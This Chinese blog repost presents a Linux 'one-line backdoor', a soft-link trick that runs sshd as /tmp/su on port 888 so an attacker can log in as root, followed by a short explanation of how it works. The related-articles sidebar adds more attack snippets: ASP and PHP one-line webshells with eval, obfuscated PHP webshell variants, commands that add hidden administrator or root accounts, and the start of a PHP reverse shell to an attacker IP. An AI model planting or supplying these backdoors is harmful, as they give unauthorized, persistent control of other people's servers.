linux经典一句话后门(我认为的)

最新推荐文章于 2022-03-30 10:52:57 发布
最新推荐文章于 2022-03-30 10:52:57 发布
阅读量648 收藏 1
点赞数
文章标签: 运维
原文链接:http://www.cnblogs.com/Id3al/articles/9291936.html
版权

  今天在看某牛的博客时看到的linux一句话后门,所以在这边记录一下,详细的解释看文末参考

1.1 后门代码

 
 
 
  
目标主机上执行:ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=888

攻击机上执行: ssh root@x.x.x.x -p 888
 
 
 
 
 1.2 解释代码
 
 
解释一下上面的代码,ln在linux中代表“连接数据”,学过Linux的同学都知道linux中的连接有两种,一种是hard link(硬连接)另一种是symbolic link(软连接)
 
 
软连接要怎样解释呢?它就类似于windows下的快捷方式,做个软连接也就是做个快捷方式。
 
 
此处的后门代码使用了软连接,因此也被叫做软连接后门,将这段代码分开来解释,ln -sf 中ln -s代表使用软连接而不是硬连接(不加参数时是硬连接),-f:代表目标文件存在时,就主动将目标文件直接删除后再创建,ln的语法为:ln 【-sf】 源文件 目标文件,因此代码时首先做一个软连接,结果给/tmp/su ,后面是开启了888端口。
 
 
此处需要注意的一点是在攻击机上运行代码时如果是Ubuntu系统或者不是root登录时此处的root需要替换为当前用户(我在Ubuntu上测试的得这样),具体截图就不贴了,很简单但威力巨大!!
 
 
下面是参考文章,这两篇文章里详细介绍了其实现的原理
 
 
参考文章:
 
 
https://www.cnblogs.com/sevck/p/6495884.html
 
 
http://blackwolfsec.cc/2017/03/24/Linux_ssh_backdoor/
 
 
 
 

 

转载于:https://www.cnblogs.com/Id3al/articles/9291936.html

                

        

        




    




    

      

        

            

              
                
                  bansu1062
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    1
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
linux一句话经典命令集锦

				
			

			

				

					weixin_33779515的博客
				

				

					08-12
					
					148
					
				

			

		

		

			
				
1.删除0字节文件find -type f -size 0 -exec rm -rf {} \;
2.查看进程按内存从大到小排列ps -e -o "%C : %p : %z : %a"|sort -k5 -nr
3.按cpu利用率从大到小排列ps -e -o "%C : %p : %z : %a"|sort -nr
4.打印说cache里的URLgrep -r -a jpg /data/ca...

			
		

	



                

              
                



	

		

			

				
					
有关一句话后门

				
			

			

				

					caiguazheng4921的博客
				

				

					04-19
					
					106
					
				

			

		

		

			
				
来源:安天团队
收集:X.DW
一般来说就是针对有输入接口的地方插入一句话后门如下面所示:(1)<%eval request("#")%>(2)转换后的代码%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%23%22%29%25%3E 63字节(3)通过echo命令 echo ^<^%eval requ...

			
		

	



                


  
              

                


	

		

			

				
					
一句话后门……PHP

				
			

			

				

					蓝天的博客
				

				

					06-12
					
					664
					
				

			

		

		

			
				
今天一个朋友服务器被攻击
验证码打不开了,奇怪中
打开一看几个文件被改了
里面加了一句
eval_r($_POST[char(86)]);
一地汗珠……
这个可真是一句无敌后门……

			
		

	





	

		

			

				
					
window和linux一句话添加后门,查看公网ip

				
			

			

				

					weixin_50815573的博客
				

				

					03-30
					
					587
					
				

			

		

		

			
				
window添加后门

net user 用户名 密码 /add

提权到管理员组

net localgroup administrators 用户名 /add

实例

net user newuser 123456 /add

net localgroup administrators newuser /add

这样就添加了一个用户,并且加入到管理员组

用户名:newuser

密码:123456

Linux添加root权限后门

创建root权限后门


useradd -p `openssl

			
		

	



		

			
		



	

		

			

				
					
那些强悍的PHP一句话后门

				
			

			

				

					大方子
				

				

					08-06
					
					9360
					
				

			

		

		

			
				
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。



强悍的PHP一句话后门

这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

利用404页面隐藏PHP小马

 

PHP

 


			1

			2

			3

			4
...

			
		

	





	

		

			

				
					
JSP一句话后门

				
			

			

				

					10-31
				

			

		

		

			
				
JSP一句话后门  JSP一句话后门是指在Java Server Pages(JSP)中使用的一种后门技术,该技术允许攻击者在服务器上写入恶意文件,从而控制服务器的行为。  知识点1: JSP是什么?  JSP全名为Java Server Pages,是一种...

			
		

	





	

		

			

				
					
用php实现批量查询清除一句话后门的代码

				
			

			

				

					10-30
				

			

		

		

			
				
一句话后门一般简单,容易隐藏危害大,查找麻烦等。今天发现了这个Xall.php专门批量查询干掉一句话后门的代码,大家可以省去不少麻烦了

			
		

	





	

		

			

				
					
整理的比较全的一句话后门代码(方面大家查找后门)

				
			

			

				

					10-28
				

			

		

		

			
				
整理的比较全的一句话后门代码(方面大家查找后门),很多情况下也会有一些特殊字符的表示,原理一样。

			
		

	





	

		

			

				
					
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)

				
			

			

				

					10-28
				

			

		

		

			
				
今天一个客户的服务器频繁被写入一句话后门,删除了还有,原来在程序中加入了如下代码,大家可以注意下base64_decode函数的参数。

			
		

	





	

		

			

				
					
一句话***大全 - 整理的比较全的一句话后门代码

				
			

			

				

					weixin_34212189的博客
				

				

					12-17
					
					607
					
				

			

		

		

			
				
asp一句话***
程序代码
<%eval request("sb")%>
程序代码
<%execute request("sb")%>
程序代码
<%execute(request("sb"))%>
程序代码
<%execute request("sb")%><%'<% loop <%:%...

			
		

	





	

		

			

				
					
php一句话后门学习(含免杀)

				
			

			

				

					qq_50854662的博客
				

				

					05-21
					
					1079
					
				

			

		

		

			
				
php一句话后门
开发很久的可利用函数 
eval和assert 
php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。 
<?php @eval($_POST['a']) ?>
但由于eval不能拆分,早期也有人喜欢用assert,这样通过编码和拆分assert,隐蔽性更高 
<?php @assert($_POST['a']) ?>
虽然有人说assert在php7.0及其以上版本被禁用,但实际上并没有禁用,而是和eval一样禁止拆分了。 
绝大部分一

			
		

	





	

		

			

				
					
php一句话客戶端,那些强悍的PHP一句话后门(3)

				
			

			

				

					weixin_33957089的博客
				

				

					03-16
					
					257
					
				

			

		

		

			
				
三个变形的一句话PHP木马第一个在菜单里写http://site/1.php?2=assert密码是1第二个$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你...

			
		

	





	

		

			

				
					
完美扫描PHP特殊一句话后门【转】

				
			

			

				

					从这里找回被遗忘的东西
				

				

					07-23
					
					680
					
				

			

		

		

			
				

&lt;?php
/**********************
作者 Spider
网上公布的各种PHP后门全军覆没
针对一些特殊变形的后门需要自己添加特征
误报率不到百分之一
**********************/
error_reporting(E_ERROR);
ini_set('max_execution_time',20000);
ini_set('memory_limit'...

			
		

	





	

		

			

				
					
再谈几种Nginx后门——发现与修复

				
			

			

				

					chennqqi的专栏
				

				

					07-20
					
					1321
					
				

			

		

		

			
				
Nginx(engine x) 是一个高性能的HTTP和反向代理web服务器,同时也提供了IMAP/POP3/SMTP服务。河马安全团队在上一篇文章中预警了一个最近流行的nginx后门...

			
		

	





	

		

			

				
					
记一次Nginx解析漏洞复现--文件类型后门测试

				
			

			

				

					Chris_HackFromCN的博客
				

				

					08-24
					
					535
					
				

			

		

		

			
				
Do what you said,say what you can do

做你说过的,说你能做的

目录

  1.什么是解析漏洞

  2.在没有解析漏洞的网站上传文件后门

  3.在存在解析漏洞的Nginx服务器上上传文件后门

  4.总结



1.什么是解析漏洞?

  解析漏洞是指服务器应用程序在解析某些精心构造的后缀文件时,会将其解析成网页脚本,从而导致网站沦陷的一种漏洞。



2.在没有解析漏洞的网站上传文件后门

  (1)工具:phpstudy、火狐浏...

			
		

	





	

		

			

				
					
Linux 多个留后门姿势

					
热门推荐

				
			

			

				

					3569
				

				

					08-17
					
					2万+
					
				

			

		

		

			
				
https://www.anquanke.com/post/id/155943

在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...

			
		

	





	

		

			

				
					
java后门_整理的比较全的一句话后门代码(方面大家查找后门)

				
			

			

				

					weixin_36335482的博客
				

				

					02-21
					
					1099
					
				

			

		

		

			
				
整理的比较全的一句话后门代码(方面大家查找后门)更新时间:2010年09月05日 12:23:00  作者:整理的比较全的一句话后门代码(方面大家查找后门),很多情况下也会有一些特殊字符的表示,原理一样。最近一句话后门不断升级大家注意防范,基本上多事字符替换过护卫神PHP一句话作者:小东$a($_POST["c"]); ?>测试成功,主要对付护卫神,其他的也可以试试dedecms5.7一句...

			
		

	





	

		

			

				
					
Nginx最新0day

				
			

			

				

					weixin_30343157的博客
				

				

					09-02
					
					1090
					
				

			

		

		

			
				
昨晚黑锅在微博上发了老外爆的Nginx漏洞,开始并没几个人关注,小我马上架环境测试验证了,我人品好随手在网上试了两个网站也验证了这个漏洞,于是乎马上就在微博上传开了。

这个漏洞是7月20日发的,老外做了非常详细的分析,大家可以深入参考:
https://nealpoole.com/blog/2011/07/possible-arbitrary-code-execution-with-nu...

			
		

	





	

		

			

				
					
一句话反弹shell代码

					
最新发布

				
			

			

				

					09-10
				

			

		

		

			
				
一句话反弹shell代码是一种常见的恶意代码,攻击者通常通过利用漏洞将这段代码注入到目标服务器的Web应用程序中。  以下是一个简单的一句话反弹shell代码的示例: ``` $sock=fsockopen("攻击者的IP地址",攻击者的...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值